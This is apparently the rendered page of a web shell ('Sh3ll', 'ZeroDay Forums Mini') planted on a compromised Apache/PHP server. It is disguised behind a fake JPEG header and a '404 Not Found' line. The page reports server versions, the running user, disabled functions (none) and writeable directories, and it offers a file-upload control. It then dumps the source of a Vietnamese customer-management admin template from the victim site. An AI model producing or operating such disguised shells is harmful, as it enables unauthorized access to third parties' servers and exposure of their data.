����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/admin.adimi/code/management/customer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/admin.adimi/code/management/customer/list_tpl.php
<div class="card">
    <div class="card-header">
        <h3 class="card-title">Khách hàng (<?php echo $total;?>)</h3>
        <div class="card-tools"><a href="?act=management&code=customer&type=post" class="btn btn-info"><i class="fas fa-user-plus"></i> Thêm mới khách hàng</a></div>
    </div>
    <!-- /.card-header -->
    <div class="card-body">
        <form action="?" method="get">
            <input type="hidden" name="act" value="management">
            <input type="hidden" name="code" value="customer">
            <div class="row">
                <div class="col-md-12">
                    <div class="row">
                        <div class="col-2">
                            <div class="form-group">
                                <label>Tên khách hàng:</label>
                                <input type="text" name="s[customer_fullname]" class="form-control" value="">
                            </div>
                        </div>
                        <div class="col-2">
                            <div class="form-group">
                                <label>Công ty:</label>
                                <input type="text" name="s[customer_company]" class="form-control" value="">
                            </div>
                        </div>
                        <div class="col-2">
                            <div class="form-group">
                                <label>Điện thoại:</label>
                                <input type="text" name="s[customer_mobile]" class="form-control" value="">
                            </div>
                        </div>
                        <div class="col-2">
                            <div class="form-group">
                                <label>Email:</label>
                                <input type="text" name="s[customer_email]" class="form-control" value="">
                            </div>
                        </div>
                        <div class="col-2">
                            <div class="form-group">
                                <label>Trạng thái:</label>
                                <select class="form-control" name="s[customer_status]">
                                    <option value="">---</option>
                                    <?php echo get_customer_status('');?>
                                </select>
                            </div>
                        </div>
                        <div class="col-1">
                            <div class="input-group-append">
                                <button type="submit" class="btn btn-small btn-success pull-right mt-4">
                                    <i class="fa fa-search"></i>
                                </button>
                            </div>
                        </div>
                    </div>

                </div>
            </div>
        </form>

        <table class="table table-bordered">
            <thead>
            <tr>
                <th style="width: 10px">#</th>
                <th>Tên khách hàng</th>
                <th>Công ty</th>
                <th>Điện thoại</th>
                <th>Email</th>
                <th>Nhật ký tư vấn</th>
                <th>Dịch vụ sử dụng</th>
                <th>Tác vụ</th>
            </tr>
            </thead>
            <tbody>
            <?php echo $txt_list;?>
            </tbody>
        </table>
    </div>
    <!-- /.card-body -->
    <div class="card-footer clearfix">
        <ul class="pagination pagination-sm m-0 float-right">
            <?php echo $nav;?>
        </ul>
    </div>
</div>

ZeroDay Forums Mini